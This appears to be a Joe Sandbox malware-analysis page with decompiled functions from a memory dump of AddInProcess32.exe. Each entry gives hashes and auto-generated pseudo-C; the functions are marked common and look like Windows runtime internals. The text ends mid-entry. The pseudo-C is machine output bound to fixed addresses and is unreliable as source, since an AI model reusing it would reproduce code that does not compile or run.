Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 392b0d38f175dc7937bc808588acacf661a56dc5832e9e09b8676f72a1cc2dd6
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 8631167260154BBAD705EBB8D490BE9FB59BF52304F04416AD51CC7201DB34EB45C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 018D7016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E018D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x194d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E018D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E018D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01877D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01899AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0189B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01874620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x018d7016
0x018d701e
0x018d702b
0x018d7033
0x018d7037
0x018d703c
0x018d703e
0x018d7041
0x018d7045
0x018d704a
0x018d7050
0x018d7055
0x018d705a
0x018d7062
0x018d7062
0x018d705a
0x018d7064
0x018d7064
0x018d7067
0x018d7071
0x018d7096
0x018d709b
0x018d70a2
0x018d70a6
0x018d70a7
0x018d70ad
0x018d70b3
0x018d70b6
0x018d70bb
0x018d70c3
0x018d70c3
0x018d70c6
0x018d70cd
0x018d70dd
0x018d70e0
0x018d70e2
0x018d70e2
0x018d70ee
0x018d7101
0x018d70f0
0x018d70f9
0x018d70f9
0x018d710a
0x018d710e
0x018d7112
0x018d7117
0x018d7118
0x018d7118
0x018d70bb
0x018d711d
0x018d7123
0x018d7131
0x018d7131
0x018d7136
0x018d713d
0x018d713e
0x018d713f
0x018d714a
0x018d714a
0x018d7084
0x018d7088
0x00000000
0x018d708e
0x018d708e
0x018d7092
0x00000000
0x018d7092

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2790dfbb012d03be467c3a70209afc633f00002399399d97d994bad9bfa62b79
Instruction ID: 32d76fdacf9478e81b592b07ab99511a9262b304187473cbbeaaedee1dc1b79c
Opcode Fuzzy Hash: 2790dfbb012d03be467c3a70209afc633f00002399399d97d994bad9bfa62b79
Instruction Fuzzy Hash: 4B31C0766047919BC720DF6CC840E6AB7E9FF88704F044A29F995C7690E730EA04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0188A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0188A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1947b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1947b10 = 8;
					 *0x1947b14 = 0x1947b0c;
					 *0x1947b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0188A990(0x1947b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0188A840(__edx, __ecx, __ecx, _t52, 0x1947b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1947b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1947b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1947b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01874620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1947b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0189F3E0(_t50,  *0x1947b14, _t8 >> 3);
						_t28 =  *0x1947b14; // 0x0
						__eflags = _t28 - 0x1947b0c;
						if(_t28 != 0x1947b0c) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1947b14 = _t50;
						_t48 = _v12;
						 *0x1947b10 = _t9;
						goto L6;
					}
					 *0x1947b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0188a713
0x0188a714
0x0188a717
0x0188a71d
0x0188a720
0x0188a722
0x0188a727
0x0188a74a
0x0188a754
0x0188a75e
0x0188a768
0x0188a76a
0x0188a773
0x0188a78b
0x0188a790
0x0188a792
0x0188a741
0x0188a741
0x0188a743
0x0188a749
0x0188a749
0x0188a732
0x0188a73a
0x0188a797
0x0188a79d
0x0188a7a3
0x0188a7a9
0x0188a7b6
0x0188a7bc
0x0188a7ca
0x0188a7e0
0x0188a7e2
0x0188a7e4
0x018c9bf2
0x00000000
0x018c9bf2
0x0188a7ed
0x0188a7f2
0x0188a800
0x0188a805
0x0188a80d
0x0188a812
0x018c9c08
0x018c9c08
0x0188a818
0x0188a81b
0x0188a821
0x0188a824
0x00000000
0x0188a824
0x0188a7ae
0x00000000
0x0188a7ae
0x0188a73c
0x0188a73e
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d7570eb8841d77d8859bba09eea82c86d63e114528e8580c5971077f18aaaf
Instruction ID: 3c6951d2a8c4f3fc5c7e185a0358c8996b79e1760275062ac5d9fdcfcfa50da4
Opcode Fuzzy Hash: 73d7570eb8841d77d8859bba09eea82c86d63e114528e8580c5971077f18aaaf
Instruction Fuzzy Hash: 5131F5B9604619EFD72DEF88D880F25BBF9FB84750F14095AE245C7284D370AA01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018861A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E018861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01885E50(0x18367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01929D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0185F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x018861b3
0x018861b5
0x018861bd
0x018861c3
0x018861c7
0x018861d2
0x018861ff
0x018861ff
0x01886201
0x01886207
0x01886207
0x018861d4
0x018861d9
0x00000000
0x00000000
0x018861df
0x018861e2
0x00000000
0x00000000
0x018861e6
0x018861e8
0x018861ee
0x018861ee
0x018861f9
0x018c762f
0x018c7632
0x018c7635
0x018c7639
0x018c7640
0x018c766e
0x018c7675
0x00000000
0x00000000
0x018c7681
0x018c7689
0x018c768d
0x018c7691
0x018c7695
0x018c7699
0x018c76af
0x018c76b5
0x018c76b7
0x018c76b7
0x018c76d7
0x018c76dc
0x00000000
0x018c76dc
0x018c76a2
0x018c76a9
0x018c7651
0x018c7653
0x018c7653
0x018c7656
0x018c7656
0x00000000
0x018c7656
0x018c7644
0x018c7646
0x018c7648
0x018c7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636c412553500a1235160f49b938a35d478eed9c20002e783bb04e9e8f00b7f4
Instruction ID: fe3215966f31bc615d0953ee26c1722088f1cf223ac9ca768cc7694532214c01
Opcode Fuzzy Hash: 636c412553500a1235160f49b938a35d478eed9c20002e783bb04e9e8f00b7f4
Instruction Fuzzy Hash: 113138716157018FE360DF1DC940B26BBE5FF88B04F15496DEA98DB252E7B0EA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0185AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0185AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x194d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1947b9c; // 0x0
					_t53 = L01874620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0189B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0189F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01866C59(_t53, _t51, _t58) != 0) {
							_t28 = E01885E50(0x183c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0188B230(_v32, _v28, 0x183c2d8, 1,  &_v24);
								_t28 = E0185F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0185aa25
0x0185aa29
0x0185aa2d
0x0185aa30
0x0185aa37
0x0185aa3c
0x018b4458
0x018b4458
0x018b4472
0x018b4474
0x018b4476
0x0185aa64
0x0185aa74
0x018b447c
0x018b4483
0x018b4492
0x0185aa52
0x0185aa54
0x0185aa5e
0x018b44a8
0x018b44ad
0x018b44af
0x018b44b6
0x018b44b6
0x018b44b9
0x018b44bc
0x018b44cd
0x018b44d3
0x018b44d6
0x018b44e1
0x018b44e1
0x018b44e6
0x018b44e8
0x018b44fb
0x018b44fb
0x018b44e8
0x00000000
0x0185aa5e
0x018b4476
0x0185aa42
0x0185aa46
0x0185aa48
0x0185aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0e8d0a5ca647a5bc1c0233b790d39c04bbce4754e0a01860d0f8ceb85ab3ee
Instruction ID: 47a541bdd3b84a15180f652d3e3850977e34e596d23da5b40fd1f78156dfc4e6
Opcode Fuzzy Hash: fa0e8d0a5ca647a5bc1c0233b790d39c04bbce4754e0a01860d0f8ceb85ab3ee
Instruction Fuzzy Hash: C631C571A0011AABCF15AF68CD81ABFB7B9EF44700F454069F902E7250E7789B51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01898EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01898EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x194d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01884E70(0x19486e4, 0x1899490, 0, 0);
					if( *0x19453e8 > 5 && E01898F33(0x19453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x19453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x19453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x183bc46;
						_t48 = E018D7B9C(0x19453e8, 0x183bc46, _t67, 0x19453e8, _t70,  &_v140);
					}
				}
				return E0189B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01898ec7
0x01898ed9
0x01898edc
0x01898ee6
0x01898ee9
0x01898eee
0x01898efc
0x01898f08
0x018d1349
0x018d1353
0x018d135d
0x018d1366
0x018d136f
0x018d1375
0x018d137c
0x018d1385
0x018d1390
0x018d1391
0x018d139c
0x018d139d
0x018d13a6
0x018d13ac
0x018d13b2
0x018d13b5
0x018d13bc
0x018d13bf
0x018d13c2
0x018d13c5
0x018d13c8
0x018d13cb
0x018d13ce
0x018d13d1
0x018d13d4
0x018d13d7
0x018d13da
0x018d13dd
0x018d13e0
0x018d13e3
0x018d13e6
0x018d13e9
0x018d13f6
0x018d1400
0x018d1400
0x01898f08
0x01898f32

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d56b299aa5f23aa7524d4c38bd11845eb6654efb7637c92df7b5348a9144b7f
Instruction ID: 09ee0e3f341636891cfab2dab26e90e0e134c0cf17f97e03644ed136833e427b
Opcode Fuzzy Hash: 8d56b299aa5f23aa7524d4c38bd11845eb6654efb7637c92df7b5348a9144b7f
Instruction Fuzzy Hash: 39419CB1D003199BDB24CFAAD980AADFBF4BB49710F5481AEE509E7240EB745A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0188E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0188E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01899670() < 0) {
					E018ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1947b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01874620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0188E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0188e730
0x0188e736
0x0188e738
0x0188e73d
0x0188e73e
0x0188e740
0x0188e749
0x0188e765
0x0188e76a
0x0188e76b
0x0188e76c
0x0188e76d
0x0188e76e
0x0188e76f
0x0188e775
0x0188e777
0x0188e77e
0x018cb675
0x0188e784
0x0188e784
0x0188e789
0x0188e7a8
0x0188e7ac
0x0188e807
0x0188e7ae
0x0188e7ae
0x0188e7b1
0x0188e7b4
0x0188e7b9
0x0188e7c0
0x0188e7c4
0x0188e7ca
0x0188e7cc
0x00000000
0x0188e7d3
0x0188e7d6
0x00000000
0x00000000
0x0188e7ff
0x0188e802
0x00000000
0x00000000
0x0188e7f9
0x0188e7fc
0x00000000
0x00000000
0x0188e7f3
0x0188e7f6
0x00000000
0x00000000
0x0188e7ed
0x0188e7f0
0x00000000
0x00000000
0x0188e7e7
0x0188e7ea
0x00000000
0x00000000
0x018cb685
0x018cb688
0x00000000
0x00000000
0x018cb682
0x00000000
0x00000000
0x0188e7cc
0x0188e7d9
0x0188e7dc
0x0188e7de
0x0188e7de
0x0188e7ac
0x0188e7e4
0x0188e74b
0x0188e751
0x0188e759
0x0188e761
0x0188e761

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83764c80fa368f932adea62402743a0a48c1f7375c1207cf036fb16ef3ff606a
Instruction ID: e03ce406c7b9c6ef2d7eeb79cde756454d5008a3dffe46cf163d2bb6a5364d5b
Opcode Fuzzy Hash: 83764c80fa368f932adea62402743a0a48c1f7375c1207cf036fb16ef3ff606a
Instruction Fuzzy Hash: 44317EB5A14249EFE744EF58D841F9ABBE8FB09314F14825AF904CB341D631EE80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0188BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0188BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1946100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01872280(0xd, 0x7e5f1a0);
				_t41 =  *0x19460f8; // 0x0
				if(_t41 != 0) {
					 *0x19460f8 =  *_t41;
					 *0x19460fc =  *0x19460fc + 0xffff;
				}
				E0186FFB0(_t41, 0x800, 0x7e5f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x19460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01874620(0x1946100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1946100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0188bc36
0x0188bc42
0x0188bc45
0x0188bc4a
0x0188bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0188bc50
0x0188bc50
0x0188bc58
0x0188bc5a
0x0188bc60
0x00000000
0x00000000
0x018ca4f2
0x018ca4f6
0x00000000
0x00000000
0x00000000
0x018ca4fc
0x0188bc79
0x0188bc7e
0x0188bc86
0x0188bd16
0x0188bd20
0x0188bd20
0x0188bc8d
0x0188bc94
0x0188bcbd
0x0188bcca
0x0188bccb
0x0188bccc
0x0188bccd
0x0188bcce
0x0188bcd4
0x0188bcea
0x0188bcee
0x0188bcf2
0x0188bd00
0x0188bd04
0x00000000
0x0188bc96
0x0188bcab
0x0188bcaf
0x0188bd2c
0x0188bd2c
0x0188bd09
0x00000000
0x0188bd09
0x0188bcb1
0x0188bcb5
0x0188bcbb
0x00000000
0x00000000
0x00000000
0x0188bcbb

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124bc796cff754b28b51f85ad2ad287d79c311d9b7ed3bc7199c3caa939a90ff
Instruction ID: 43a91cb8fab9771cab93bc684fc0763fe8f77101f590158366d78d72743c3166
Opcode Fuzzy Hash: 124bc796cff754b28b51f85ad2ad287d79c311d9b7ed3bc7199c3caa939a90ff
